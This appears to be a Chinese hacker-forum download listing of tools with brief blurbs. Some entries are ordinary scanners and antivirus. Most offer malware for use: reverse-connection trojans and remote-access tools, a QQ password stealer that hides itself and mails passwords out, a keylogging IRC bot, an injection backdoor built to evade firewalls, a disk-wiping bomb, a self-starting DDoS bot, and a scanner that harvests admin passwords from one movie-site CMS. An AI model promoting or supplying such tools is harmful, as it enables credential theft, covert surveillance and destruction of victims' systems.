端口：TCP 80、21163、22076、22365、23812、41431、43576
启动：HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run "CleanRegCV1.3"
运行后添加文件到 c:/WINDOWS/LICENSE.TXT c:/WINDOWS/Matrix.scr

 

台湾反弹端口型木马简体字版2.02
谢谢小joke给我们简体汉化了本版软件，(原版是繁体字)
Peep 台湾第一匹反弹端口型木马,是一套运用反端口技术的远程监控软体，运用此原理可以达到一般远程控制软体所无法达到之功能，例如可对区域网路及有架设防火墙的电脑作监控，被控端电脑将具有自动回传连线之功能，通讯埠可任意动态修改，及具有独立连线，也就是说除您本人其他人无法连线监控。其他的功能还有上
线通知、连线速率调整、远端档案总管、远端桌面监控、远端进程管理、远端登通报服务、DDoS攻击、还有被控端程式设置精灵、有常驻选择、文件捆绑及连线方式等选项。控制端程式使用 MFC Document/View 架构撰写，让您监控更方便，被控端程式用 SDK 撰写，程式码短小并具有隐藏功能。

Microsoft Visual Studio.net 2003阿虫安装无错版(6CD)
这个看来是个人用自己电脑做的.所以各位想要的尽快下载..

1
2
3
4
5
6

 

 

154款黑客小工具

这些是教程....一起放上吧.呵呵////

第一期下载

第二期下载

 

顺便把鹰派专用安全教程都放上...
中国鹰派专用安全教程-第四版

中国鹰派专用安全教程-第五版

中国鹰派专用安全教程-第六版

PC软件管理大师1.5
语言界面 简体中文
软件性质 破解软件
文件大小 1995KB　
软件介绍 　
独具软件自动搜集，自动分类，最快速启动等强大功能，是真正的PC软件管理大师。
具备以下特点。
1 全自动的软件搜集和分类功能：
可以选择多种方式让管理大师自动搜索电脑中的软件信息并自动加以分类，无需费时的一次次人工添加。
2 软件分类：可以对电脑中的软件按照五个大类，25个小类来仔细分类归纳。而且最多可对六百多个软件进行分类，完全可以满足用户对常用软件的分类管理的需要。
3 软件启动：本软件的程序快速启动可以说是我见过的最快的，对所有750个软件，无需点击便可方便查找到。而且每次启动软件后，使用次数最多的软件自动向上排序，所以最常用的软件总是最方便启动的。
4 分类设置： 有一点要说，一般的软件管理软件所添加的软件分类后如果觉得分类不好要改为其它类别是很麻烦的。本软件提供了方便的软件分类的更改和交换功能。
5 自定义分类： 可以自定义自己喜欢的分类，最多有125个。
6 自动检测：有时用户会删除一些软件，而软件管理大师会自动检测并把该软件的无效分类删除掉

 
 

XPortScan v2.0
XPortScan v2.0，07月10日发布，多线程端口安全扫描工具，内包含Windows/Linux 两版本，附源代码

 

超级Ping V2.17
超级Ping V2.17 是一个可以实现对多个主机网络状态的实时监测，并有自动记录分析结果、断网自动告警 、端口扫描、数据库管理等功能的网络监测软件。监测的结果可以记录在以IP地址为文件名的文本文件中，也可以记录在Acess数据库中，可自由选择。PingPlus有连续监测和定时监测两种网络监测，可根据需要设置。
PingPlus的使用非常简便、功能强大且稳定，符合多数网管的要求，可以极大地方便网管人员的工作.

 

金瓶梅电影后台管理员扫描器
黄金眼 VER 1.1

暂时还是扫描“金梅电影”那套程序的管理员名和密码最有效。不过呢，多了一个“自定义”功能。这样如果对方修改了表名或字段名，你也可以自己设定。本来这个功能是想用XML做成站点模板，方便大家添加新的站点用来扫描。那样通用性更强些。但是实在懒得做那么大的修改，先凑合吧。

在测试页面那要填写全：比如“http://www.abc.com/movie.asp?id=1184”然后扫描就可以了。只开了两个线程扫，不过速度还可以。这个版本对扫描的算法做了改进，“据说”快多了~~~ ^@^

顺便说一下~~C#写的，所以要装.net freamwork
http://www.microsoft.com/downloads/details.aspx?FamilyID=262d25e3-f589-4842-8157-
034d1e7cf3a3&displaylang=zh-cn
到这里下吧！

如果你确认是“金梅电影”而又扫不出来帐号，那你运气很不好。站长一定是修改过程序了。

用“金梅电影”的伙计们别怪我 ^@^

如果扫描器扫描出管理员名或密码的长度，而扫描不出管理员名或密码。那么站长一定使用的是中文或其他符号（比如ALT+255输入的假空格）。要知道，这次针对算法的改进不够彻底，还不能做那么大量的扫描。

 

nmap-3.45-win32
nmap-3.45-win32内附详细教程

 

Nikto 1.31
著名的且功能强大的WEB扫描工具.

它可以扫描指定主机的WEB类型,主机名,特定目录,COOKIE,特定CGI漏洞,返回主机允许的http模式等等,比如:扫描wendavx,SQlnet.log(包含敏感信息).您可以自己不断增加和修改扫描选项,使之成为功能完备的WEB审计工具( 当入侵扫描工具当然也可以)

 

 

GFI LANguard Network Security Scanner 3.3

 

针对ms03-043的Messenger服务漏洞的扫描器
来自Foundstone的，针对ms03-043的Messenger服务漏洞的扫描器。1.05版

 

eeye的ms03-043 Messenger漏洞扫描器
来自eeye的ms03-043 Messenger漏洞扫描器
MS03-043 Messenger Service ScanningUtility
Usage:
scanmsgr target=<range>
Scans systems on 135/udp testing for which are vulnerable to MS03-043
More help at: http://www.iss.net/support/product_utilities/ms03-043
Example: scanmsgr target=192.168.1.1-192.168.1.255

 

MS03-046漏洞扫描器
针对MS03-046 Microsoft Exchange 2000 Heap Overflow的漏洞扫描器

 

L-ScanPort1.0
L-ScanPort1.0 是一款基于高级扫描技术(SYN刺探)的扫描器。
它的扫描速度在同类安全软件中是比较快的。最快可以 1s 刺探接近500个IP(远程刺探),当然那和您的网速(N重要的一点)和机器的性能有关系，在测试版中没有本地扫描的功能，在1.0中加上了。它的优势最要在于大规模的扫描，经测试它的速度比SuperScan还要快，因为SuperScan并不是基于嗅探技术的。在扫描的同时还会留下日志。SYN刺探就不会。 总之是一个比较不错的安全小软件。
希望网管和安全爱好者们能喜欢。如果您有什么更好的建议或者发现软件有误报，请告诉我，在此先谢啦～ 

 

Shadow Security Scanner v6.6 Build 44正式版
hadow Security Scanner 是一款非常专业的安全漏洞扫描软件，这是一款超级扫描工具，能扫描服务器各种漏洞，包括很多漏洞扫描、账号扫描、DOS扫描...而且漏洞数据可以随时更新。

 

测试cgi程序的小工具
一个测试cgi程序的小工具。
详细说明在压缩包里面有。

以前写的，这几天老有人给我发带后门的网页。
才想起用这个。

 

Shadow Security Scanner v6.6.41
非常专业的安全漏洞扫描软件，这是一款超级扫描工具，能扫描服务器各种漏洞，包括很多漏洞扫描、账号扫描、DOS扫描...而且漏洞数据可以随时更新。

 

Access Diver v4.12
ccessDiver 是检测网站安全漏洞的工具，能通过不同代理服务器多线程检测登录帐号、密码。请勿用于网站破解，否则一切后果自负！

使用教程

 

 

[url=http://www.cnse8.com/opensoft.asp?soft_id=337&url=1]ScanPort
dos下的一个快速端口扫描器
portlist.lst 是个端口列表文件
可以用编辑器打开自己定义需要扫描的端口
注意最多只能定义512个端口号。

 

cain25b13.exe
这是一个可以破解屏保；PWL密码；共享密码；缓存口令；远程共享口令；access Databases；SMB口令等的综合工具，还可以远程破解，可以挂字典以及指定字符进攻.用与Win 2K/XP下。

 

wollf-v1.5
木马,扩展Telnet服务，集成Ftp服务器、键盘记录、Sniffer(for win2k only)、端口转发等功能，可反向连接，可通过参数选择随系统启动或作为普通进程启动。

 

QQ IP数据库 纯真版1105
使用方法：把文件QQWry.Dat解压到QQ的目录，覆盖原有的文件。关闭QQ，重新启动。就能升级QQ的IP数据库

 

Devil5[线程插入后门]
Devil5是一个线程插入后门程序，是在Devil4的基础上改进而来的。主要改进如下：
1、和上一个版本比较起来，程序更加稳定。
2、修改了上一个版本不支持多用户的缺陷。
3、修改了上一个版本在多个IP情况下，不能正常连接的重大BUG。
4、增加了线程插入时间间隔功能，也就是每隔一个时间周期，线程就会自动搜索你所设置的进程名称，然后把后门插入到里面。增加了这个功能后，就可以把后门Devil5插入到一些不随系统启动的程序里面，例如：

iexplore.exe中，从而更容易躲避防火墙的阻挡。

 

Panda AntiVirus Titanium 2004 v3.0 中文钛金版
5星级软件-世界上第一个能在WINSOCK层上进行病毒扫描的防病毒软体。它能够对Email和文件下载进行即时扫描。它能自动进行病毒资料库的智慧更新。它能对包括Windows 95/98, Windows NT Workstations 3.51/4.0,

Windows 3.x, Ms-Dos, OS/2, Exchange/Ms Outlook等各种用户端程式提供保护,它是第一个专门爲Window98开发的防毒软体。它也爲Windows95， Windows NT工作站 3.51及4.0， Windows3.1x，MS-DOS及OS/2提供保护。

因此，无论您使用何种作业系统，您都能受到全面保护。

 

asp木马红粉佳人修正版应用动画
海阳顶端网asp木马红粉佳人修正版应用动画

 

木马克星V5.42 Build 1103破解版
可以查杀5021种国际木马，112种电子邮件木马，保证查杀冰河类文件关联木马，oicq类寄生木马，icmp类幽灵木马,网络神偷类反弹木马。内置木马防火墙，任何黑客试图与本机建立连接，都需要Iparmor 确认，不仅可以查杀木马，更可以查黑客。

 

PE Explorer V1.9.4 破解版
一个强大的程序资源编辑工具，可以直接查看、修改软件的资源，包括菜单、对话框、字符串表等；另外，还具备有 W32DASM 软件的反编译能力和 PEditor 软件的PE文件头编辑功能；该软件支持插件，你可以通过不断的增加插件加强该软件的功能，还有很多实用的功能。

 

冰盾IE修复清理动态保护器 v2.0
修复被恶意网站破坏的IE浏览器，清除用户上机后的一切痕迹。（如：文档记录、密码、访问网址等17项清理目标）保护您的隐私。

 

实战 SQL Injection
1、猜管理员账号的表
2、猜相应表中的用户的字段名以及密码的字段名.
3、猜出用户名的长度和密码的长度.
3、猜出用户名和密码
4、找到管理界面进去登陆管理.

 

Windows 2000 系统漏洞修复 V0.7
1.修复系统默认共享漏洞/关闭445端口/关于系统信使服务/
禁止建立空连接/禁止远程控制注册表/ 等漏洞修复
2.提供自己优化功能，方便加强系统安全
3.支持漏洞扫描。可检测当前系统存已知的漏洞，并提供下载。
4.抵抗DDOS攻击

0.7 更新：
1.修正<漏洞扫描>判断IESP1的错误
2.<漏洞扫描>增加KB828035,KB826232,KB825119,KB824141,KB823559,KB823182扫描。

 

 

OICQ密码轻松盗v8.0(完美版)
v8.0更新注册信息存储方式，支持2003普通登入。
v7.3支持WIN2000,WIN98,WINME,WINXP,欢迎大家使用。
6.5版更新6.4的BUG.
支持OICQ最新版QQ2003.而且又支持了更多的邮箱.
轻轻松松盗取OICQ密码.如果你在使过程中没有收到信箱那可能是邮件设置错误。原理:以后在本机上网的用户如果使用OICQ那么他的OICQ就被发送到你的信箱里面了。确定以后，程序自运隐藏，无法更改信息.

 

用MD5加密的多种语言代码.(包括js,vb,asp等)
用MD5加密的多种语言代码.(包括js,vb,asp等)

 

像win2000终端一样控制unix
像win2000终端一样控制unix

 

反弹式HTTP隧道远程控制软件PcShare
V2.0 beta1

本远程控制软件为客户连接的反弹方式，由客户主动连接服务器，通信方式为HTTP隧道，可以控制局域网内部的机器。

控制功能包括屏幕控制，文件操作，注册表编辑，窗口管理，进程管理、服务管理、按键记录、文件查找等大部分功能远程控制功能。

文件传输支持多文件下载，并能断点续传。
详细情况请见软件的帮助。

本软件属于远程控制类软件，请勿用于非法用途，否则一切后果自负。

非常欢迎您的测试，并希望你能就使用中碰到的问题和BUG与我们反映，请登陆我们的论坛
http://www.20cn.net/club/并在软件开发版中反映问题。同时也希望您能够加入我们的软
件开发项目中，发布你所创作的软件。

 

全能IP助手2.95
功能特色：

显示浏览器(IE,TE)正在访问
的网站的地理位置及其IP；
显示并监视本机IP及其所在;
离线查询某一IP的地理位置;
将网址转换为IP地址;
一级域名Whois查询；
快速Ping操作;
透明输出，不影响其它操作；
自带四万多条数据段;
免费绿色,方便易用.

t

 

局域网查看工具1.3
该软件是一款非常方便实用的对局域网各种信息进行查看的工具，采用多线程技术，搜索速度很快。界面采用列表的形式，把各种信息列举出来，如局域网内每台计算机的计算机名，IP地址，工作组，MAC地址，用户，共享文件夹，共享文件，各种类型的服务器等信息，还有给对方发消息，Ping对方，打开计算机等功能。

 

简单蜜罐的反击图文教学

 

还原精灵删除程序
现在到处可以下载到还原精灵的删除程序，我感觉不是很好，其实将它的移除程序稍做改写，移除还原精灵的效果还是不错的。
解压后直接运行即可，输入密码时，输入任意密码或不输都可，最后完成卸载，请不要将此程序用来卸载别人的还原精灵，否则后果自负，与我无关呀。

 

木马克星(iparmor) 5.42.1023 完美破解版（可升级）
可以查杀5021种国际木马，112种电子邮件木马，保证查杀冰河类文件关联木马，oicq类寄生木马，icmp类幽灵木马,网络神偷类反弹木马。内置木马防火墙，任何黑客试图与本机建立连接，都需要Iparmor 确认，不仅可以查杀木马，更可以查黑客。

 

IRC木马yulihubot 1.1 版
改了几个bug，加了键盘记录,感谢wineggdrop开放的键盘记录源码

 

WS_FTP FTPD溢出程序
Exploit from Xfocus

 

系统锁定程序
本程序是用VB制作！ 须要安有VB运行库才能运行！

解锁密码为：chinac

 

风雪 V2.5
这是风雪2.5版，国产远程控制程序，此版主要是修改了反弹服务端读取不到域名IP的错误，同时修改了自动进入监听状态的端口和时间间隔（详细请看使用说明的11点第三四段和14点）。

 

OICQ密码轻松盗 v7.0 (完美版)
支持OICQ最新版QQ2003.而且又支持了更多的邮箱.
轻轻松松盗取OICQ密码.该软件只能在WIN98下使用，不能在WINME,WIN2000下使用。如果你在使过程中没有收到信箱那可能是邮件设置错误。原理:以后在本机上网的用户如果使用OICQ那么他的OICQ就被发送到你的信箱里面了。确定以后，程序自运隐藏，无法更改信息.
v7.0支持WIN2000,WIN98,WINME,WINXP,欢迎大家使用。

 

凶宝宝消息精灵 V3.92
这是一个消息发送软件。它可以搜索网络上支持消息功能的主机。也可以同时向一系列的主机发送消息。此软件运用多线程技术。该版本对扫描速度做了质的提高。配置比较好的计算机上一分钟多一点可以扫描一个C段。

 

RPC漏洞扫描器 v1.0.3 汉化版
RPC漏洞扫描器是一个RPC安全漏洞扫描器。可用于系统漏洞安全检查，及早发现自己系统中存在的漏洞，及时补救。检查出有漏洞的话，赶快去“微软”网站下载补丁吧！

前些日子，“冲击波”病毒就是利用RPC安全漏洞进行攻击的。

 

硬盘终结者 1.4
硬盘终结者是由蔬菜工作室出品的一款极其恶性的硬盘炸弹程序，它是WIN32 PE程序，因为用了VxD技术，所以能在Windows环境中直接写硬盘扇区，而无需象其它同类软件一样要等待重启时进行破坏。

　　本软件可以直接运行于Windows环境中，运行后立即进行破坏，不会显示任何界面，它会从硬盘第一物理扇区(0柱0面1扇区)开始，向其中写入内存垃圾数据(与CIH发作相同，呵呵~~~其实就是从CIH学来的^_^)。

 

网络神偷 5.0 版
网络神偷是一个专业级的远程文件访问工具，具有以下特点：

1.针对磁盘文件系统：本软件针对远程文件访问，而不是远程控制，力求“专而精”。并高度模枋 Windows 资源管理器，简单易用，我们的目标是使访问远程驱动器就象访问本地的一样方便。

2.强大的文件操作功能：可对本地及远程驱动器进行：新建文件、新建文件夹、查找文件、剪切、复制、粘贴(包括：本地文件操作、上传、下载、同远程主机的文件复制与移动)、本地运行、远程运行、重命名、删除、查看、修改驱动器属性、修改文件属性等操作，支持断点续传，并且所有操作均支持多选及文件夹操作。

3.运用了“反弹端口原理”与“HTTP 隧道技术”：“反弹端口原理”：由服务端主动连接客户端，因此在互联网上可以访问到局域网里通过 NAT 代理(透明代理)上网的电脑，并且可以穿过防火墙(包括：包过滤型及代理型防火墙)。
“HTTP隧道技术”：把所有要传送的数据全部封装到 HTTP 协议里进行传送，因此在互联网上可以访问到局域网里通过 HTTP、SOCKS4/5 代理上网的电脑，而且也不会有什么防火墙会拦截。所以，本软件支持所有的上网方式，既“只要能浏览网页的电脑，网络神偷都能访问！”。本软件可以访问以下上网方式的电脑：拨号上网、ISDN、ADSL、DDN、Cable Modem、NAT 透明代理、HTTP 的 GET 型代理、HTTP 的 CONNECT 型代理、SOCKS4 代理、SOCKS4A 代理、SOCKS5 代理。

4.先进的服务端上线通知功能：服务端通过 UDP 协议发消息给客户端，在“服务端在线列表”里可以看到服务端的主机名、互联网的IP地址、局域网的IP地址、地址位置、上线时间、在线时长，所有信息一目了然，实时性高、安全可靠，是 Email 通知方式所不能比的。而且还有运用了“HTTP 隧道技术”的服务端上线通知功能。

5.所有公开的数据均用 RSA 数据加密。

注：软件使用前，使用者需提供一个主页空间供它使用，主页空间申请方法请看
Readme.txt。

 

 

Superscan 4.0
Very cool 超级扫描！可以随意选择IP地址和端口，而且端口后面都有简单说明，地址输入更轻松，在找到的主机上，单击右键可以打开http浏览，telnet登陆，ftp上传，还有nslookup域名查询等功能，扫描速度很快！

 

粉色信鸽 v2.0
一个功能相当强的,使用方便的木马!特新!
在注册表管理方面,绝对一流.
进程管理,不会让你失望.文件管理更不用说!
屏幕控制容易反掌.键盘,鼠标即时控制.
其他木马的功能基本都齐.

它不偷QQ密码,但是它却可以:窃听所有被控端的QQ聊天内容!

 
 

 

DDoS攻击者 V1.4
本软件是一个DDoS攻击工具，程序运行后自动驻入系统，并在以后随系统启动，在上网时自动对事先设定好的目标进行攻击。可以自由设置“并发连接线程数”、“最大TCP连接数”等参数。由于采用了与其它同类软件不同的攻击方法，效果更好。

注：本软件只可用于DDoS攻击测试，请勿将其用于非法用途。

 

BO2K 1.3版
这个不用说了吧，地球人都知道了，最新版的，玩玩吧，我的瑞星最新病毒库还未能查杀，真不知怎么搞的。

 

superscan 4.0 汉化版
扫描器老大推出了最新版本，此版本增加了很多功能，可以自定义端口列表，扫描方式，请求方式等等，经过2天的汉化，把一些基本的都汉化了，大家可以使用下，如果发现有哪里不恰当的，可以及时联系我，我会及时修改：）

 

风雪 V2.7
风雪2.7版。国产远程控制程序，此版主要是修改了下载文件夹时有子文件夹客户端建立子文件夹失败的BUG，加上了下载文件夹的文件类型下载的功能。（请看使用说明的第4点）。　

 

oo.bat
给您造成的不便深感抱歉，感谢你对菜鸟们的支持。shutdown.exe这个文件存在于windows/system32/下（windows xp）为例。
本软件说明：适用于winxp操作系统。双击运行即可。会破坏系统，请谨慎。
附件中的是最新的，对其稍作修改，请多多指教，谢谢。

 

IPScanner v1.77 注册版
这是一款强大有力的可以帮助你更好管理计算机和网络的工具，具有Ping、检测打开的端口、检测Netbios names/User name/MAC (Ethernet) vendor、共享、NT Services、Local Groups、Global Groups、检测远程系统时间等功能。

proxyfinder 1.8
代理服务器搜索者 v1.8
专门搜索 sock4/5 和 Tunnel (允许通过Connect 指令代理各种服务的)类型的代理服务器。速度奇快，多线程，每10秒钟搜索一个C 类网段.实际测试 56KB 200线程 30分钟一个B 段.100% 准确率. 运行稳定，每天24小时运行。安装简单,使用方便,支持右键功能和Ctrl+A,Ctrl+C,Ctrl+V.可以随意导出和导入校验.proxy 纪录格式
通用。

 

Shadow Security Scanner v6.6 Build 44
Shadow Security Scanner v6.6 Build 44破解版
非常专业的安全漏洞扫描软件，这是一款超级扫描工具，能扫描服务器各种漏洞，包括很多漏洞扫描、账号扫描、DOS扫描...而且漏洞数据可以随时更新。

 

L-ScanPort 1.0
L-ScanPort1.0 是一款基于高级扫描技术(SYN刺探)的扫描器。
它的扫描速度在同类安全软件中是比较快的。最快可以 1s 刺探接近500个IP(远程刺探),当然那和您的网速(N重要的一点)和机器的性能有关系，在测试版中没有本地扫描的功能，在1.0中加上了。它的优势最要在于大规模的扫描，经测试它的速度比SuperScan还要快，因为SuperScan并不是基于嗅探技术的。在扫描的同时还会留下日志。SYN刺探就不会。 总之是一个比较不错的安全小软件。

 

scanmsgr.rar
命令行的ms03-043漏洞扫描器

 

RetinaMSGSVC
来自eeye的ms03-043 Messenger漏洞扫描器

 

MessengerScan 1.05
来自Foundstone的，针对ms03-043的Messenger服务漏洞的扫描器。1.05版

 

ShadowScan
这是一款速度快但体积很小的端口扫描工具。

 

GFI LANguard Network Security Scanner 3.3
GFI LANguard Network Security Scanner 3.3 Build 20030924 注册版这是一款网络管理员用来检测和履行网络安全审计的软件，包含端口扫描和安全扫描部分，有DNS查找、WHOIS、TRACEROUTE、SNMP WALK、SNMP审计、MSSQL审计、列举计算机等功能，可以用来检测共享、不必要的端口、特洛伊木马、不牢固口令、使用者和组等，其分析功能极其强大，速度很快，支持在线更新漏洞资料。推荐Win 2000/XP/2003 下运行，受Win 98/ME 系统本身缘故，有部分功能使用限制。

 

Nmap for win 3.45
nmap被开发用于允许系统管理员察看一个大的网络系统有哪些主机以及其上运行何种服务。它支持多种协议的扫描如UDP，TCP connect(),TCP SYN (half open), ftp proxy (bounce attack),Reverse-ident, ICMP (ping sweep), FIN, ACK sweep,Xmas Tree, SYN sweep, 和Null扫描。你可以从SCAN TYPES一节中察看相关细节。

nmap还提供一些实用功能如通过tcp/ip来甄别操作系统类型、秘密扫描、动态延迟和重发、平行扫描、通过并行的PING侦测下属的主机、欺骗扫描、端口过滤探测、直接的RPC扫描、分布扫描、灵活的目标选择以及端口的描述。

对非ROOT的用户来说，nmap的正式版可以做很多重要的东西了。不幸的是部份关键的核心功能（比如raw sockets）需要root权限。所以尽量以root的身份运行nmap。

运行nmap后通常会得到一个关于你扫描的机器的一个实用的端口列表。nmap总是显示该服务的服务名称,端口号，状态以及协议。状态有''open'',''filtered''和''unfiltered''三种。''open''指的是目标机器将会在该端口接受你的连接请求。''filtered''指的是有防火墙、过滤装置或者其它的网络障碍物在这个端口阻挡了nmap 进一步查明端口是否开放的动作。至于''unfiltered''则只有在大多数的扫描端口都处在''filtered''状态下才会出现的。

根据选项的使用，nmap还可以报告远程主机下面的特性：使用的操作系统、TCP连续性、在各端口上绑定的应用程序用户的用户名、DNS名、主机是否是个smurf地址以及一些其它功能。

……

 

nmap 3.45
这是一款运行在单一主机和大型网络情况下优秀的端口扫描工具，具有高速，秘密，可以绕过防火墙等特点，

支持多种协议，如TCP，UDP，ICMP 等。Nmap支持Vanilla TCP connect 扫描，TCP SYN (half open)扫描，TCP

FIN扫描，Xmas或NULL (stealth)扫描，TCP ftp proxy (bounce attack)扫描，使用IP分片的SYN/FIN扫描（可绕过某些包过滤器），TCP ACK和Window扫描, UDP raw ICMP port unreachable扫描，ICMP ping-sweep扫描, TCP Ping扫描，Direct (non portmapper) RPC扫描，通过TCP/IP指纹技术实现远程操作系统识别和Reverse-
ident扫描。Nmap也具有很多高性能和可靠性的特点，如动态延时计算，包超时重发，并行端口扫描，通过并行Ping探测主机是否当掉...该版本增加了banner扫描的功能 (-A参数)。

./nmap -A -T4 localhost
Starting nmap 3.40PVT16 ( http://www.insecure.org/nmap/ ) at 2003-09-0702:56 PDT

PORT STATE SERVICE VERSION
21/tcp open ftp WU-FTPD wu-2.6.1-20
22/tcp open ssh OpenSSH 3.1p1 (protocol 1.99)
79/tcp open finger Linux fingerd
443/tcp open ssl/http Apache httpd 2.0.39 ((Unix) mod_perl/1.99_04-dev

 

IPScanner v1.77
IPScanner v1.77 注册版
这是一款强大有力的可以帮助你更好管理计算机和网络的工具，具有Ping、检测打开的端口、检测Netbios names/User name/MAC (Ethernet) vendor、共享、NT Services、Local Groups、Global Groups、检测远程系统时间等功能。

 

Retina DCOM Scanner 1.1.0
eEye安全公司针对微软MS03-026以及最新MS03-039 RPC DCOM 漏洞的扫描工具。

 

superscan V4.0汉化版
superscan V4.0汉化版
非常不错的扫描器，4.0版本增加了很多功能，可以自定义端口列表，扫描方式，请求方式等等

 

Retina Network Security Scanner v4.9.115
Retina Network Security Scanner v4.9.115注册版
著名网络安全公司 eEye 的风险评估扫描工具，它对扫描的目标NT主机的威胁极大，通过扫描可以得到许多关于目标主机的系统弱点和信息。你又可以通过他，有效的发觉和修复各种安全方面的隐患和漏洞，界面和SSS差不多，可以和SSS媲美，但也有不少自己特色的东西。
目前在nmap.org评出来的2003年的top75网络安全工具中,应属于商业软件的佼佼者了。更新较快,漏洞库齐全,扫描速度较快。
可以在线升级。

 

局域网扫描大师 V1.0
局域网扫描大师 V1.0注册版
该软件是一款非常方便实用的局域网共享资源扫描软件，采用多线程技术，扫描速度很快。界面采用资源管理器的方式，把共享资源列举出来，可以搜索视频，音频，软件，文档等，你还可以打开指定文件所在的文件夹，复制到指定的文件夹，还可以拖动到系统为你设置的文件夹，如果文件夹所在的磁盘空间不够时，你可以移动文件到其他磁盘或文件夹。该软件以实用为原则，是一款不错的软件。

 

NetInfo v4.8 Build 804
NetInfo v4.8 Build 804 注册版
著名的网络工具箱 NetInfo，其功能相当完善，包括本地信息、连接信息、Ping 工具、追踪工具、HTML 工具、获取时间工具、时间工具、获取信息工具、在线人工具、引用工具、扫描器工具、服务项目工具，以及 IP 监视工具（IP Monitor）。可以利用这些工具查看远程主机的任何信息：包括全部用户信息、信息中心的信息、主机可连接性能情况、获取一个指定网站（或网页）的HTML文件资料、去远程主机的网关数量等。

 

DComRpc-xscan.zip
dcomrpc漏洞X-Scan23插件

 

ScanMs Tool
ScanMs Tool
ISS安全公司07月30日发布，运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOM RPC 接口远程缓冲区溢出漏洞（823980-MS03-026）”补丁程序。如果没有安装补丁程序，该IP地址就会显示出[VULN]。
C:/>scanms.exe 192.168.0.1-192.168.0.254
192.168.0.2 [Windows XP] [ptch] [ptch] 5.6
192.168.0.5 [unknown010] [????] [VULN] 0.0
192.168.0.10 [Windows XP] [ptch] [ptch] 5.6
192.168.0.55 [Windows XP] [ptch] [ptch] 5.6

 

SQLScan v1.2
通过连接MS SQL服务器1433端口，可以扫描特定的主机或某一范围内的主机，通过字典文件可以扫描SQL口令和多个口令，以及创建新的秘密的管理口令到那些容易遭受攻击的服务器上面，但如果是xp_cmdshell将不能创建新的秘密的管理口令。

 

T-smb.rar
探测远程主机的smb信息

 

rpc_locator.rar
基于命令行下的RPC扫描器

 

铁血扫描器V1.01
这是一个速度和质量都还可以的批处理IPC扫描器。请不要改成蠕虫。

运行后会生成scan.bat,user.txt和pass.txt三个文件，你可以扩充里面的内容本程序正确格式如下：
ipcscan.bat [起始IP] [结束IP]
只有起始IP无结束IP时程序将测试 [起始IP]--255.255.255.255内的所有IP
如果不带任何IP本程序的范围为：0.0.0.0--255.255.255.255
结束程序请按CTRL+C,开始测试请按任意键......
例如：ipcscan 192.168.0.1 192.168.0.255

 

以自定义的一个命令行扫描器，后台运行，当你定义好你要扫的弱点及IP段后，执行后就不用管了。
 
 

[url=http://www.chinesehack.org/down/show.asp?id=3711&down=1]无处藏身(Seekyou) V4.32 Build 030707
1.IP地址定位。也就是通常所说的根据IP地址，查找其所在地的功能。支持剪切板操作，自动查找。我们的软件以前只支持这种功能。2.增加局域网IP地址扫描功能，能够扫描主机名，用户名，工作组和MAC。能将查找结果保存为TXT文件或XLS（EXCEL文件）格式。3.增加PING的功能，能够进行主机和IP地址的相互转化。4.增加端口扫描功能，能够对指定IP地址的指定端口或者指定段进行扫描，获取端口服务信息。5.增加Route功能，能够使你清楚的看到要连接一个站点所经过的每一个网关及路由器IP地址。6.增加本机信息查询，使你可以很方便的获得计算机的各方面设置。7.NetSend功能。可用于两台装有NT内核的操作系统用户之间相互通信。不必再借助其他软件，我们仅仅是在利用操作系统给我们提供的功能来实现的。8.增加多语种支持的功能，目前支持简体中文，繁体中文。界面全部更新，更加美观。：）利用多线程技术，Winsock2技术，COM组件技术，使搜索速
度更快。希望大家能够喜欢。

 

net-snmp 5.0.8
netsnmp (原UCD-SNMP)是目前最完整的开放源代码SNMP实现，支持SNMP v1/v2/v2c/v3和MIB2，包含完整的SNMP / SNMP Trap 和 SNMP Agent实现，是研究SNMP协议和进行SNMP网管必不可少的好工具。

支持平台:
Linux
*BSD
Windows 98 / nt / 2000 / XP / 2003
*Unix
OpenVMS

==================================================
net-snmp-5.0.8-Linux_2.4.19_i686.tar.gz netsnmp 5.0.8 Linux二进制预编译版
net-snmp-5.0.8-win32.zip netsnmp 5.0.8 windows二进制预编译版
net-snmp-5.0.8.tar.gz netsnmp 5.0.8 源代码

 

ProxyExpert 4.5
一，功能：
验证：
1,快速HTTP代理验证 每10分钟自动验证并排队(分别检测8、5、5、3个)；
2,模拟IE验证HTTP/HTTPS代理(用来进行高容错的标准代理服务器测试)；
3,验证HTTP代理对SSL的支持(HTTPS)；
4,验证HTTP代理对CONNECT的支持(用来上FTP和MSN)；
5,验证HTTP+HTTP级连的二级代理；
6,验证SOCKS+HTTP级连二次代理；
7,验证SOCKS4/SOCKS4A/SOCKS5代理；
8,监视验证的整个过程。
调度：
1,对IE每个窗口指定不同代理；
2,快捷键WIN+X快速切换代理 (直接连接/当前最快代理/自动调度)
WIN+Z跳出窗口ALT+左点击列表也是快速设置代理；
3,HTTP/SOCKS自动代理调度127.0.0.1:2003 根据要连接的IP自动选择(直接/一次代理/
二次代理),
根据连接请求类型自动选择(HTTP/SOCKS4/5代理)；
4,内置SOCKS+HTTP级连的二级代理服务器127.0.0.1:2003(看Google的快照用)；
5,内置HTTP+HTTP级连的二级代理服务器同上，可以切换级连方式,默认为SOCKS+HTTP；
5,内置支持HTTPS/CONNECT的HTTP代理服务器（支持HTTP1.0/HTTP1.1部分指令/
支持POST大附件/可以作为FlashFxp的穿梭最高速度6M字节/S)；
7,内置SOCKS2HTTP:127.0.0.1:2004,把CONNECT类型的代理转化成SOCKS4代理。

 

Amap v2.7
THC发布的工具，能够判断开放在不同端口的服务类型，即使默认服务端口被对方修改了，具有完美的SSL支持、完整的RPC探测等特点。

 

RpcScan
RPC终点映射(endpoint mapper)程序, 存在于系统RPC服务中, 它担任维持所有与运行RPC机器的连接信息. 此程序可以通过135端口枚举远程主机连接信息,它可能会让您获取一些敏感信息.

 

疾速扫描2003
红衣刺客写的一个端口扫描器。

 

ipc批处理扫描工具
ipc批处理扫描工具

 

LanHelper(局域网助手) V1.0
